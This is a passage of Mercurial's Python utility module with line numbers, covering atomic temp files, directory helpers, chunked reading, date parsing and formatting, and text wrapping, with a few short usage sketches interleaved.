1654 1654 close() when you are done writing, and atomictempfile will rename
1655 1655 the temporary copy to the original name, making the changes
1656 1656 visible. If the object is destroyed without being closed, all your
1657 1657 writes are discarded.
1658 1658
1659 1659 The checkambig argument of the constructor is used with filestat,
1660 1660 and is useful only if the target file is guarded by a lock (e.g.
1661 1661 repo.lock or repo.wlock).
1662 1662 '''
1663 1663 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1664 1664 self.__name = name # permanent name
1665 1665 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1666 1666 createmode=createmode)
1667 1667 self._fp = posixfile(self._tempname, mode)
1668 1668 self._checkambig = checkambig
1669 1669
1670 1670 # delegated methods
1671 1671 self.read = self._fp.read
1672 1672 self.write = self._fp.write
1673 1673 self.seek = self._fp.seek
1674 1674 self.tell = self._fp.tell
1675 1675 self.fileno = self._fp.fileno
1676 1676
1677 1677 def close(self):
1678 1678 if not self._fp.closed:
1679 1679 self._fp.close()
1680 1680 filename = localpath(self.__name)
1681 1681 oldstat = self._checkambig and filestat.frompath(filename)
1682 1682 if oldstat and oldstat.stat:
1683 1683 rename(self._tempname, filename)
1684 1684 newstat = filestat.frompath(filename)
1685 1685 if newstat.isambig(oldstat):
1686 1686 # stat of changed file is ambiguous to original one
1687 1687 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1688 1688 os.utime(filename, (advanced, advanced))
1689 1689 else:
1690 1690 rename(self._tempname, filename)
1691 1691
1692 1692 def discard(self):
1693 1693 if not self._fp.closed:
1694 1694 try:
1695 1695 os.unlink(self._tempname)
1696 1696 except OSError:
1697 1697 pass
1698 1698 self._fp.close()
1699 1699
1700 1700 def __del__(self):
1701 1701 if safehasattr(self, '_fp'): # constructor actually did something
1702 1702 self.discard()
1703 1703
1704 1704 def __enter__(self):
1705 1705 return self
1706 1706
1707 1707 def __exit__(self, exctype, excvalue, traceback):
1708 1708 if exctype is not None:
1709 1709 self.discard()
1710 1710 else:
1711 1711 self.close()
1712 1712
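A usage sketch for the class above (the file name is illustrative). Thanks to __enter__/__exit__, the context-manager form discards the temporary copy on error and renames it into place on success:

with atomictempfile('hgrc-snippet', mode='wb') as f:
    f.write(b'[ui]\n')
    f.write(b'username = someone\n')
# on normal exit, close() renamed the temporary copy over
# 'hgrc-snippet'; on an exception, discard() removed it and the
# original file was left untouched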
1713 1713 def unlinkpath(f, ignoremissing=False):
1714 1714 """unlink and remove the directory if it is empty"""
1715 1715 if ignoremissing:
1716 1716 tryunlink(f)
1717 1717 else:
1718 1718 unlink(f)
1719 1719 # try removing directories that might now be empty
1720 1720 try:
1721 1721 removedirs(os.path.dirname(f))
1722 1722 except OSError:
1723 1723 pass
1724 1724
1725 1725 def tryunlink(f):
1726 1726 """Attempt to remove a file, ignoring ENOENT errors."""
1727 1727 try:
1728 1728 unlink(f)
1729 1729 except OSError as e:
1730 1730 if e.errno != errno.ENOENT:
1731 1731 raise
1732 1732
1733 1733 def makedirs(name, mode=None, notindexed=False):
1734 1734 """recursive directory creation with parent mode inheritance
1735 1735
1736 1736 Newly created directories are marked as "not to be indexed by
1737 1737 the content indexing service", if ``notindexed`` is specified
1738 1738 for "write" mode access.
1739 1739 """
1740 1740 try:
1741 1741 makedir(name, notindexed)
1742 1742 except OSError as err:
1743 1743 if err.errno == errno.EEXIST:
1744 1744 return
1745 1745 if err.errno != errno.ENOENT or not name:
1746 1746 raise
1747 1747 parent = os.path.dirname(os.path.abspath(name))
1748 1748 if parent == name:
1749 1749 raise
1750 1750 makedirs(parent, mode, notindexed)
1751 1751 try:
1752 1752 makedir(name, notindexed)
1753 1753 except OSError as err:
1754 1754 # Catch EEXIST to handle races
1755 1755 if err.errno == errno.EEXIST:
1756 1756 return
1757 1757 raise
1758 1758 if mode is not None:
1759 1759 os.chmod(name, mode)
1760 1760
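For instance, the recursion above lets a nested path be created in one call, tolerates concurrent creators via the EEXIST checks, and applies ``mode`` to each directory it actually creates (paths are illustrative):

makedirs('a/b/c')               # creates a, a/b and a/b/c as needed
makedirs('a/b/c')               # no-op: EEXIST is swallowed
makedirs('a/b/d', mode=0o700)   # only newly created dirs are chmod'ed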
1761 1761 def readfile(path):
1762 1762 with open(path, 'rb') as fp:
1763 1763 return fp.read()
1764 1764
1765 1765 def writefile(path, text):
1766 1766 with open(path, 'wb') as fp:
1767 1767 fp.write(text)
1768 1768
1769 1769 def appendfile(path, text):
1770 1770 with open(path, 'ab') as fp:
1771 1771 fp.write(text)
1772 1772
1773 1773 class chunkbuffer(object):
1774 1774 """Allow arbitrary sized chunks of data to be efficiently read from an
1775 1775 iterator over chunks of arbitrary size."""
1776 1776
1777 1777 def __init__(self, in_iter):
1778 1778 """in_iter is the iterator that's iterating over the input chunks."""
1779 1779 def splitbig(chunks):
1780 1780 for chunk in chunks:
1781 1781 if len(chunk) > 2**20:
1782 1782 pos = 0
1783 1783 while pos < len(chunk):
1784 1784 end = pos + 2 ** 18
1785 1785 yield chunk[pos:end]
1786 1786 pos = end
1787 1787 else:
1788 1788 yield chunk
1789 1789 self.iter = splitbig(in_iter)
1790 1790 self._queue = collections.deque()
1791 1791 self._chunkoffset = 0
1792 1792
1793 1793 def read(self, l=None):
1794 1794 """Read L bytes of data from the iterator of chunks of data.
1795 1795 Returns less than L bytes if the iterator runs dry.
1796 1796
1797 1797 If size parameter is omitted, read everything"""
1798 1798 if l is None:
1799 1799 return ''.join(self.iter)
1800 1800
1801 1801 left = l
1802 1802 buf = []
1803 1803 queue = self._queue
1804 1804 while left > 0:
1805 1805 # refill the queue
1806 1806 if not queue:
1807 1807 target = 2**18
1808 1808 for chunk in self.iter:
1809 1809 queue.append(chunk)
1810 1810 target -= len(chunk)
1811 1811 if target <= 0:
1812 1812 break
1813 1813 if not queue:
1814 1814 break
1815 1815
1816 1816 # The easy way to do this would be to queue.popleft(), modify the
1817 1817 # chunk (if necessary), then queue.appendleft(). However, for cases
1818 1818 # where we read partial chunk content, this incurs 2 dequeue
1819 1819 # mutations and creates a new str for the remaining chunk in the
1820 1820 # queue. Our code below avoids this overhead.
1821 1821
1822 1822 chunk = queue[0]
1823 1823 chunkl = len(chunk)
1824 1824 offset = self._chunkoffset
1825 1825
1826 1826 # Use full chunk.
1827 1827 if offset == 0 and left >= chunkl:
1828 1828 left -= chunkl
1829 1829 queue.popleft()
1830 1830 buf.append(chunk)
1831 1831 # self._chunkoffset remains at 0.
1832 1832 continue
1833 1833
1834 1834 chunkremaining = chunkl - offset
1835 1835
1836 1836 # Use all of unconsumed part of chunk.
1837 1837 if left >= chunkremaining:
1838 1838 left -= chunkremaining
1839 1839 queue.popleft()
1840 1840 # The offset == 0 case was handled by the block above, so here
1841 1841 # the slice won't merely copy the whole chunk via ``chunk[0:]``.
1842 1842 buf.append(chunk[offset:])
1843 1843 self._chunkoffset = 0
1844 1844
1845 1845 # Partial chunk needed.
1846 1846 else:
1847 1847 buf.append(chunk[offset:offset + left])
1848 1848 self._chunkoffset += left
1849 1849 left -= chunkremaining # goes negative here, ending the loop
1850 1850
1851 1851 return ''.join(buf)
1852 1852
1853 1853 def filechunkiter(f, size=131072, limit=None):
1854 1854 """Create a generator that produces the data in the file size
1855 1855 (default 131072) bytes at a time, up to optional limit (default is
1856 1856 to read all data). Chunks may be less than size bytes if the
1857 1857 chunk is the last chunk in the file, or the file is a socket or
1858 1858 some other type of file that sometimes reads less data than is
1859 1859 requested."""
1860 1860 assert size >= 0
1861 1861 assert limit is None or limit >= 0
1862 1862 while True:
1863 1863 if limit is None:
1864 1864 nbytes = size
1865 1865 else:
1866 1866 nbytes = min(limit, size)
1867 1867 s = nbytes and f.read(nbytes)
1868 1868 if not s:
1869 1869 break
1870 1870 if limit:
1871 1871 limit -= len(s)
1872 1872 yield s
1873 1873
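The two helpers above compose naturally: filechunkiter turns a file into an iterator of blocks, and chunkbuffer turns an iterator of arbitrarily sized blocks back into exact-size reads (a sketch; 'payload.bin' and 'process' are placeholders):

fp = open('payload.bin', 'rb')
buf = chunkbuffer(filechunkiter(fp, size=8192))
header = buf.read(16)        # exactly 16 bytes (fewer only at EOF)
while True:
    block = buf.read(4096)   # exact-size reads regardless of how
    if not block:            # the underlying file was chunked
        break
    process(block)
fp.close()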
1874 1874 def makedate(timestamp=None):
1875 1875 '''Return a unix timestamp (or the current time) as a (unixtime,
1876 1876 offset) tuple based on the local timezone.'''
1877 1877 if timestamp is None:
1878 1878 timestamp = time.time()
1879 1879 if timestamp < 0:
1880 1880 hint = _("check your clock")
1881 1881 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1882 1882 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1883 1883 datetime.datetime.fromtimestamp(timestamp))
1884 1884 tz = delta.days * 86400 + delta.seconds
1885 1885 return timestamp, tz
1886 1886
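The datetime subtraction above is a portable way to obtain the local UTC offset: both values describe the same instant, one in UTC and one in local time, so their difference is the zone offset in seconds (positive west of UTC, matching the convention used by datestr() below):

import datetime, time

ts = time.time()
delta = (datetime.datetime.utcfromtimestamp(ts) -
         datetime.datetime.fromtimestamp(ts))
tz = delta.days * 86400 + delta.seconds   # e.g. 18000 for UTC-5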
1887 1887 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1888 1888 """represent a (unixtime, offset) tuple as a localized time.
1889 1889 unixtime is seconds since the epoch, and offset is the time zone's
1890 1890 number of seconds away from UTC.
1891 1891
1892 1892 >>> datestr((0, 0))
1893 1893 'Thu Jan 01 00:00:00 1970 +0000'
1894 1894 >>> datestr((42, 0))
1895 1895 'Thu Jan 01 00:00:42 1970 +0000'
1896 1896 >>> datestr((-42, 0))
1897 1897 'Wed Dec 31 23:59:18 1969 +0000'
1898 1898 >>> datestr((0x7fffffff, 0))
1899 1899 'Tue Jan 19 03:14:07 2038 +0000'
1900 1900 >>> datestr((-0x80000000, 0))
1901 1901 'Fri Dec 13 20:45:52 1901 +0000'
1902 1902 """
1903 1903 t, tz = date or makedate()
1904 1904 if "%1" in format or "%2" in format or "%z" in format:
1905 1905 sign = (tz > 0) and "-" or "+"
1906 1906 minutes = abs(tz) // 60
1907 1907 q, r = divmod(minutes, 60)
1908 1908 format = format.replace("%z", "%1%2")
1909 1909 format = format.replace("%1", "%c%02d" % (sign, q))
1910 1910 format = format.replace("%2", "%02d" % r)
1911 1911 d = t - tz
1912 1912 if d > 0x7fffffff:
1913 1913 d = 0x7fffffff
1914 1914 elif d < -0x80000000:
1915 1915 d = -0x80000000
1916 1916 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1917 1917 # because they use the gmtime() system call which is buggy on Windows
1918 1918 # for negative values.
1919 1919 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1920 1920 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1921 1921 return s
1922 1922
1923 1923 def shortdate(date=None):
1924 1924 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1925 1925 return datestr(date, format='%Y-%m-%d')
1926 1926
1927 1927 def parsetimezone(s):
1928 1928 """find a trailing timezone, if any, in string, and return a
1929 1929 (offset, remainder) pair"""
1930 1930
1931 1931 if s.endswith("GMT") or s.endswith("UTC"):
1932 1932 return 0, s[:-3].rstrip()
1933 1933
1934 1934 # Unix-style timezones [+-]hhmm
1935 1935 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1936 1936 sign = (s[-5] == "+") and 1 or -1
1937 1937 hours = int(s[-4:-2])
1938 1938 minutes = int(s[-2:])
1939 1939 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1940 1940
1941 1941 # ISO8601 trailing Z
1942 1942 if s.endswith("Z") and s[-2:-1].isdigit():
1943 1943 return 0, s[:-1]
1944 1944
1945 1945 # ISO8601-style [+-]hh:mm
1946 1946 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1947 1947 s[-5:-3].isdigit() and s[-2:].isdigit()):
1948 1948 sign = (s[-6] == "+") and 1 or -1
1949 1949 hours = int(s[-5:-3])
1950 1950 minutes = int(s[-2:])
1951 1951 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1952 1952
1953 1953 return None, s
1954 1954
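Some concrete inputs for the parser above; note the sign convention (positive offsets are west of UTC, hence the negation of '+hhmm' zones):

parsetimezone('2017-01-01 12:00 +0200')  # (-7200, '2017-01-01 12:00')
parsetimezone('2017-01-01 12:00 -0500')  # (18000, '2017-01-01 12:00')
parsetimezone('2017-01-01 12:00 UTC')    # (0, '2017-01-01 12:00')
parsetimezone('no timezone here')        # (None, 'no timezone here')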
1955 1955 def strdate(string, format, defaults=None):
1956 1956 """parse a localized time string and return a (unixtime, offset) tuple.
1957 1957 if the string cannot be parsed, ValueError is raised."""
1958 1958 if defaults is None:
1959 1959 defaults = {}
1960 1960
1961 1961 # NOTE: unixtime = localunixtime + offset
1962 1962 offset, date = parsetimezone(string)
1963 1963
1964 1964 # add missing elements from defaults
1965 1965 usenow = False # default to using biased defaults
1966 1966 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1967 1967 part = pycompat.bytestr(part)
1968 1968 found = [True for p in part if ("%"+p) in format]
1969 1969 if not found:
1970 1970 date += "@" + defaults[part][usenow]
1971 1971 format += "@%" + part[0]
1972 1972 else:
1973 1973 # We've found a specific time element, less specific time
1974 1974 # elements are relative to today
1975 1975 usenow = True
1976 1976
1977 1977 timetuple = time.strptime(encoding.strfromlocal(date),
1978 1978 encoding.strfromlocal(format))
1979 1979 localunixtime = int(calendar.timegm(timetuple))
1980 1980 if offset is None:
1981 1981 # local timezone
1982 1982 unixtime = int(time.mktime(timetuple))
1983 1983 offset = unixtime - localunixtime
1984 1984 else:
1985 1985 unixtime = localunixtime + offset
1986 1986 return unixtime, offset
1987 1987
1988 1988 def parsedate(date, formats=None, bias=None):
1989 1989 """parse a localized date/time and return a (unixtime, offset) tuple.
1990 1990
1991 1991 The date may be a "unixtime offset" string or in one of the specified
1992 1992 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1993 1993
1994 1994 >>> parsedate(' today ') == parsedate(\
1995 1995 datetime.date.today().strftime('%b %d'))
1996 1996 True
1997 1997 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
1998 1998 datetime.timedelta(days=1)\
1999 1999 ).strftime('%b %d'))
2000 2000 True
2001 2001 >>> now, tz = makedate()
2002 2002 >>> strnow, strtz = parsedate('now')
2003 2003 >>> (strnow - now) < 1
2004 2004 True
2005 2005 >>> tz == strtz
2006 2006 True
2007 2007 """
2008 2008 if bias is None:
2009 2009 bias = {}
2010 2010 if not date:
2011 2011 return 0, 0
2012 2012 if isinstance(date, tuple) and len(date) == 2:
2013 2013 return date
2014 2014 if not formats:
2015 2015 formats = defaultdateformats
2016 2016 date = date.strip()
2017 2017
2018 2018 if date == 'now' or date == _('now'):
2019 2019 return makedate()
2020 2020 if date == 'today' or date == _('today'):
2021 2021 date = datetime.date.today().strftime('%b %d')
2022 2022 elif date == 'yesterday' or date == _('yesterday'):
2023 2023 date = (datetime.date.today() -
2024 2024 datetime.timedelta(days=1)).strftime('%b %d')
2025 2025
2026 2026 try:
2027 2027 when, offset = map(int, date.split(' '))
2028 2028 except ValueError:
2029 2029 # fill out defaults
2030 2030 now = makedate()
2031 2031 defaults = {}
2032 2032 for part in ("d", "mb", "yY", "HI", "M", "S"):
2033 2033 # this piece is for rounding the specific end of unknowns
2034 2034 b = bias.get(part)
2035 2035 if b is None:
2036 2036 if part[0:1] in "HMS":
2037 2037 b = "00"
2038 2038 else:
2039 2039 b = "0"
2040 2040
2041 2041 # this piece is for matching the generic end to today's date
2042 2042 n = datestr(now, "%" + part[0:1])
2043 2043
2044 2044 defaults[part] = (b, n)
2045 2045
2046 2046 for format in formats:
2047 2047 try:
2048 2048 when, offset = strdate(date, format, defaults)
2049 2049 except (ValueError, OverflowError):
2050 2050 pass
2051 2051 else:
2052 2052 break
2053 2053 else:
2054 2054 raise error.ParseError(_('invalid date: %r') % date)
2055 2055 # validate explicit (probably user-specified) date and
2056 2056 # time zone offset. values must fit in signed 32 bits for
2057 2057 # current 32-bit linux runtimes. timezones go from UTC-12
2058 2058 # to UTC+14
2059 2059 if when < -0x80000000 or when > 0x7fffffff:
2060 2060 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2061 2061 if offset < -50400 or offset > 43200:
2062 2062 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2063 2063 return when, offset
2064 2064
2065 2065 def matchdate(date):
2066 2066 """Return a function that matches a given date match specifier
2067 2067
2068 2068 Formats include:
2069 2069
2070 2070 '{date}' match a given date to the accuracy provided
2071 2071
2072 2072 '<{date}' on or before a given date
2073 2073
2074 2074 '>{date}' on or after a given date
2075 2075
2076 2076 >>> p1 = parsedate("10:29:59")
2077 2077 >>> p2 = parsedate("10:30:00")
2078 2078 >>> p3 = parsedate("10:30:59")
2079 2079 >>> p4 = parsedate("10:31:00")
2080 2080 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2081 2081 >>> f = matchdate("10:30")
2082 2082 >>> f(p1[0])
2083 2083 False
2084 2084 >>> f(p2[0])
2085 2085 True
2086 2086 >>> f(p3[0])
2087 2087 True
2088 2088 >>> f(p4[0])
2089 2089 False
2090 2090 >>> f(p5[0])
2091 2091 False
2092 2092 """
2093 2093
2094 2094 def lower(date):
2095 2095 d = {'mb': "1", 'd': "1"}
2096 2096 return parsedate(date, extendeddateformats, d)[0]
2097 2097
2098 2098 def upper(date):
2099 2099 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2100 2100 for days in ("31", "30", "29"):
2101 2101 try:
2102 2102 d["d"] = days
2103 2103 return parsedate(date, extendeddateformats, d)[0]
2104 2104 except Abort:
2105 2105 pass
2106 2106 d["d"] = "28"
2107 2107 return parsedate(date, extendeddateformats, d)[0]
2108 2108
2109 2109 date = date.strip()
2110 2110
2111 2111 if not date:
2112 2112 raise Abort(_("dates cannot consist entirely of whitespace"))
2113 2113 elif date[0] == "<":
2114 2114 if not date[1:]:
2115 2115 raise Abort(_("invalid day spec, use '<DATE'"))
2116 2116 when = upper(date[1:])
2117 2117 return lambda x: x <= when
2118 2118 elif date[0] == ">":
2119 2119 if not date[1:]:
2120 2120 raise Abort(_("invalid day spec, use '>DATE'"))
2121 2121 when = lower(date[1:])
2122 2122 return lambda x: x >= when
2123 2123 elif date[0] == "-":
2124 2124 try:
2125 2125 days = int(date[1:])
2126 2126 except ValueError:
2127 2127 raise Abort(_("invalid day spec: %s") % date[1:])
2128 2128 if days < 0:
2129 2129 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2130 2130 % date[1:])
2131 2131 when = makedate()[0] - days * 3600 * 24
2132 2132 return lambda x: x >= when
2133 2133 elif " to " in date:
2134 2134 a, b = date.split(" to ")
2135 2135 start, stop = lower(a), upper(b)
2136 2136 return lambda x: x >= start and x <= stop
2137 2137 else:
2138 2138 start, stop = lower(date), upper(date)
2139 2139 return lambda x: x >= start and x <= stop
2140 2140
2141 2141 def stringmatcher(pattern, casesensitive=True):
2142 2142 """
2143 2143 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2144 2144 returns the matcher name, pattern, and matcher function.
2145 2145 missing or unknown prefixes are treated as literal matches.
2146 2146
2147 2147 helper for tests:
2148 2148 >>> def test(pattern, *tests):
2149 2149 ... kind, pattern, matcher = stringmatcher(pattern)
2150 2150 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2151 2151 >>> def itest(pattern, *tests):
2152 2152 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2153 2153 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2154 2154
2155 2155 exact matching (no prefix):
2156 2156 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2157 2157 ('literal', 'abcdefg', [False, False, True])
2158 2158
2159 2159 regex matching ('re:' prefix)
2160 2160 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2161 2161 ('re', 'a.+b', [False, False, True])
2162 2162
2163 2163 force exact matches ('literal:' prefix)
2164 2164 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2165 2165 ('literal', 're:foobar', [False, True])
2166 2166
2167 2167 unknown prefixes are ignored and treated as literals
2168 2168 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2169 2169 ('literal', 'foo:bar', [False, False, True])
2170 2170
2171 2171 case insensitive regex matches
2172 2172 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2173 2173 ('re', 'A.+b', [False, False, True])
2174 2174
2175 2175 case insensitive literal matches
2176 2176 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2177 2177 ('literal', 'ABCDEFG', [False, False, True])
2178 2178 """
2179 2179 if pattern.startswith('re:'):
2180 2180 pattern = pattern[3:]
2181 2181 try:
2182 2182 flags = 0
2183 2183 if not casesensitive:
2184 2184 flags = remod.I
2185 2185 regex = remod.compile(pattern, flags)
2186 2186 except remod.error as e:
2187 2187 raise error.ParseError(_('invalid regular expression: %s')
2188 2188 % e)
2189 2189 return 're', pattern, regex.search
2190 2190 elif pattern.startswith('literal:'):
2191 2191 pattern = pattern[8:]
2192 2192
2193 2193 match = pattern.__eq__
2194 2194
2195 2195 if not casesensitive:
2196 2196 ipat = encoding.lower(pattern)
2197 2197 match = lambda s: ipat == encoding.lower(s)
2198 2198 return 'literal', pattern, match
2199 2199
2200 2200 def shortuser(user):
2201 2201 """Return a short representation of a user name or email address."""
2202 2202 f = user.find('@')
2203 2203 if f >= 0:
2204 2204 user = user[:f]
2205 2205 f = user.find('<')
2206 2206 if f >= 0:
2207 2207 user = user[f + 1:]
2208 2208 f = user.find(' ')
2209 2209 if f >= 0:
2210 2210 user = user[:f]
2211 2211 f = user.find('.')
2212 2212 if f >= 0:
2213 2213 user = user[:f]
2214 2214 return user
2215 2215
2216 2216 def emailuser(user):
2217 2217 """Return the user portion of an email address."""
2218 2218 f = user.find('@')
2219 2219 if f >= 0:
2220 2220 user = user[:f]
2221 2221 f = user.find('<')
2222 2222 if f >= 0:
2223 2223 user = user[f + 1:]
2224 2224 return user
2225 2225
2226 2226 def email(author):
2227 2227 '''get email of author.'''
2228 2228 r = author.find('>')
2229 2229 if r == -1:
2230 2230 r = None
2231 2231 return author[author.find('<') + 1:r]
2232 2232
2233 2233 def ellipsis(text, maxlength=400):
2234 2234 """Trim string to at most maxlength (default: 400) columns in display."""
2235 2235 return encoding.trim(text, maxlength, ellipsis='...')
2236 2236
2237 2237 def unitcountfn(*unittable):
2238 2238 '''return a function that renders a readable count of some quantity'''
2239 2239
2240 2240 def go(count):
2241 2241 for multiplier, divisor, format in unittable:
2242 2242 if abs(count) >= divisor * multiplier:
2243 2243 return format % (count / float(divisor))
2244 2244 return unittable[-1][2] % count
2245 2245
2246 2246 return go
2247 2247
2248 2248 def processlinerange(fromline, toline):
2249 2249 """Check that linerange <fromline>:<toline> makes sense and return a
2250 2250 0-based range.
2251 2251
2252 2252 >>> processlinerange(10, 20)
2253 2253 (9, 20)
2254 2254 >>> processlinerange(2, 1)
2255 2255 Traceback (most recent call last):
2256 2256 ...
2257 2257 ParseError: line range must be positive
2258 2258 >>> processlinerange(0, 5)
2259 2259 Traceback (most recent call last):
2260 2260 ...
2261 2261 ParseError: fromline must be strictly positive
2262 2262 """
2263 2263 if toline - fromline < 0:
2264 2264 raise error.ParseError(_("line range must be positive"))
2265 2265 if fromline < 1:
2266 2266 raise error.ParseError(_("fromline must be strictly positive"))
2267 2267 return fromline - 1, toline
2268 2268
2269 2269 bytecount = unitcountfn(
2270 2270 (100, 1 << 30, _('%.0f GB')),
2271 2271 (10, 1 << 30, _('%.1f GB')),
2272 2272 (1, 1 << 30, _('%.2f GB')),
2273 2273 (100, 1 << 20, _('%.0f MB')),
2274 2274 (10, 1 << 20, _('%.1f MB')),
2275 2275 (1, 1 << 20, _('%.2f MB')),
2276 2276 (100, 1 << 10, _('%.0f KB')),
2277 2277 (10, 1 << 10, _('%.1f KB')),
2278 2278 (1, 1 << 10, _('%.2f KB')),
2279 2279 (1, 1, _('%.0f bytes')),
2280 2280 )
2281 2281
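The table above is ordered so that the first matching (multiplier, divisor) pair selects both the unit and the precision, giving larger values fewer decimal places:

bytecount(100)             # '100 bytes'
bytecount(4096)            # '4.00 KB'
bytecount(10 * (1 << 20))  # '10.0 MB'
bytecount(3 << 30)         # '3.00 GB'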
2282 2282 # Matches a single EOL which can either be a CRLF where repeated CR
2283 2283 # are removed or a LF. We do not care about old Macintosh files, so a
2284 2284 # stray CR is an error.
2285 2285 _eolre = remod.compile(br'\r*\n')
2286 2286
2287 2287 def tolf(s):
2288 2288 return _eolre.sub('\n', s)
2289 2289
2290 2290 def tocrlf(s):
2291 2291 return _eolre.sub('\r\n', s)
2292 2292
2293 2293 if pycompat.oslinesep == '\r\n':
2294 2294 tonativeeol = tocrlf
2295 2295 fromnativeeol = tolf
2296 2296 else:
2297 2297 tonativeeol = pycompat.identity
2298 2298 fromnativeeol = pycompat.identity
2299 2299
2300 2300 def escapestr(s):
2301 2301 # call underlying function of s.encode('string_escape') directly for
2302 2302 # Python 3 compatibility
2303 2303 return codecs.escape_encode(s)[0]
2304 2304
2305 2305 def unescapestr(s):
2306 2306 return codecs.escape_decode(s)[0]
2307 2307
2308 2308 def forcebytestr(obj):
2309 2309 """Portably format an arbitrary object (e.g. exception) into a byte
2310 2310 string."""
2311 2311 try:
2312 2312 return pycompat.bytestr(obj)
2313 2313 except UnicodeEncodeError:
2314 2314 # non-ascii string, may be lossy
2315 2315 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2316 2316
2317 2317 def uirepr(s):
2318 2318 # Avoid double backslash in Windows path repr()
2319 2319 return repr(s).replace('\\\\', '\\')
2320 2320
2321 2321 # delay import of textwrap
2322 2322 def MBTextWrapper(**kwargs):
2323 2323 class tw(textwrap.TextWrapper):
2324 2324 """
2325 2325 Extend TextWrapper for width-awareness.
2326 2326
2327 2327 Neither the number of 'bytes' in any encoding nor the number of
2328 2328 'characters' is appropriate for calculating terminal columns of a string.
2329 2329
2330 2330 The original TextWrapper implementation uses the built-in 'len()'
2331 2331 directly, so overriding is needed to use the width of each character.
2332 2332
2333 2333 In addition, characters classified as 'ambiguous' width are
2334 2334 treated as wide in East Asian locales, but as narrow elsewhere.
2335 2335
2336 2336 This requires a user decision to determine the width of such characters.
2337 2337 """
2338 2338 def _cutdown(self, ucstr, space_left):
2339 2339 l = 0
2340 2340 colwidth = encoding.ucolwidth
2341 2341 for i in xrange(len(ucstr)):
2342 2342 l += colwidth(ucstr[i])
2343 2343 if space_left < l:
2344 2344 return (ucstr[:i], ucstr[i:])
2345 2345 return ucstr, ''
2346 2346
2347 2347 # overriding of base class
2348 2348 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2349 2349 space_left = max(width - cur_len, 1)
2350 2350
2351 2351 if self.break_long_words:
2352 2352 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2353 2353 cur_line.append(cut)
2354 2354 reversed_chunks[-1] = res
2355 2355 elif not cur_line:
2356 2356 cur_line.append(reversed_chunks.pop())
2357 2357
2358 2358 # this overriding code is imported from TextWrapper of Python 2.6
2359 2359 # to calculate columns of string by 'encoding.ucolwidth()'
2360 2360 def _wrap_chunks(self, chunks):
2361 2361 colwidth = encoding.ucolwidth
2362 2362
2363 2363 lines = []
2364 2364 if self.width <= 0:
2365 2365 raise ValueError("invalid width %r (must be > 0)" % self.width)
2366 2366
2367 2367 # Arrange in reverse order so items can be efficiently popped
2368 2368 # from a stack of chunks.
2369 2369 chunks.reverse()
2370 2370
2371 2371 while chunks:
2372 2372
2373 2373 # Start the list of chunks that will make up the current line.
2374 2374 # cur_len is just the length of all the chunks in cur_line.
2375 2375 cur_line = []
2376 2376 cur_len = 0
2377 2377
2378 2378 # Figure out which static string will prefix this line.
2379 2379 if lines:
2380 2380 indent = self.subsequent_indent
2381 2381 else:
2382 2382 indent = self.initial_indent
2383 2383
2384 2384 # Maximum width for this line.
2385 2385 width = self.width - len(indent)
2386 2386
2387 2387 # First chunk on line is whitespace -- drop it, unless this
2388 2388 # is the very beginning of the text (i.e. no lines started yet).
2389 2389 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2390 2390 del chunks[-1]
2391 2391
2392 2392 while chunks:
2393 2393 l = colwidth(chunks[-1])
2394 2394
2395 2395 # Can at least squeeze this chunk onto the current line.
2396 2396 if cur_len + l <= width:
2397 2397 cur_line.append(chunks.pop())
2398 2398 cur_len += l
2399 2399
2400 2400 # Nope, this line is full.
2401 2401 else:
2402 2402 break
2403 2403
2404 2404 # The current line is full, and the next chunk is too big to
2405 2405 # fit on *any* line (not just this one).
2406 2406 if chunks and colwidth(chunks[-1]) > width:
2407 2407 self._handle_long_word(chunks, cur_line, cur_len, width)
2408 2408
2409 2409 # If the last chunk on this line is all whitespace, drop it.
2410 2410 if (self.drop_whitespace and
2411 2411 cur_line and cur_line[-1].strip() == r''):
2412 2412 del cur_line[-1]
2413 2413
2414 2414 # Convert current line back to a string and store it in list
2415 2415 # of all lines (return value).
2416 2416 if cur_line:
2417 2417 lines.append(indent + r''.join(cur_line))
2418 2418
2419 2419 return lines
2420 2420
2421 2421 global MBTextWrapper
2422 2422 MBTextWrapper = tw
2423 2423 return tw(**kwargs)
2424 2424
2425 2425 def wrap(line, width, initindent='', hangindent=''):
2426 2426 maxindent = max(len(hangindent), len(initindent))
2427 2427 if width <= maxindent:
2428 2428 # adjust for weird terminal size
2429 2429 width = max(78, maxindent + 1)
2430 2430 line = line.decode(pycompat.sysstr(encoding.encoding),
2431 2431 pycompat.sysstr(encoding.encodingmode))
2432 2432 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
